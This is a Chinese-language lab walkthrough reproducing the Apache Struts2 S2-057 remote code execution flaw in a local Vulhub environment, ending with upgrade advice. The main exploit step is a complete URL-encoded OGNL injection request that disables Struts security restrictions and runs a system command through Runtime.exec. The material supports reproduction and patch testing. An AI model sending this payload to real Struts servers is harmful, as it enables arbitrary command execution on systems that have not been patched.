Struts2 S2-057 Remote Code Execution Vulnerablity遠程代碼執行
一.漏洞介紹
(一)編號
S2-057
(二)概述
S2-057漏洞產生于網站配置xml的時候,有一個namespace的值,該值并沒有做詳細的安全過濾導致可以寫入到xml上,尤其url標簽值也沒有做通配符的過濾,導致可以執行遠程代碼以及系統命令到服務器系統中去
(三)影響版本
Apache Struts 2.3 – Struts 2.3.34
Apache Struts 2.5 – Struts 2.5.16
(四)適用條件
-alwaysSelectFullNamespace為true,
-action元素沒有設定namespace屬性,或者使用了通配符,
命名空間將由用戶從uri傳遞并決議為OGNL運算式,最終導致遠程代碼執行漏洞,
二.操作步驟
(一)Vulhub ip地址:http://192.168.126.136
檔案位于:/home/vulhub/vulhub-master/struts/S2-057
1.環境搭建 docker-compose build和docker-compose up -d
2.檢查docker是否開啟 docker-compose ps
(二)Windows
1.登錄struts測驗頁面 http://192.168.126.136:8080/struts2-showcase
2.開啟攔截抓包,點擊view
3.發送到重發器,并修改get位置,再點go
Go得到下圖所示結果,說明存在漏洞,可以看到,200*200的結果已經在Location頭中回傳,
4.修改資料包 資料包內容為
GET /struts2-showcase**/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27id%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/**actionChain1.action HTTP/1.1
Host: xx.xx.xx.xx:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: pma_lang=zh_CN; PHPSESSID=ktl19cua6l8te70hdre5vti097; security=low; JSESSIONID=8A451123FAEEC6210EA07D642B8D4778
Connection: close
/struts2-showcase*/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27id%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action HTTP/1.1*
斜體為建構式,粗體為執行命令
成功執行操作
三.漏洞防護
(一)盡快升級到Apache Struts 2.3.35 或 Struts 2.5.17版
參考文章 https://blog.csdn.net/lhh134/article/details/87368699
https://cloud.tencent.com/developer/article/1511916
https://www.jianshu.com/p/6db98793d043
https://blog.csdn.net/Z_Grant/article/details/101213506
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/23033.html
標籤:AI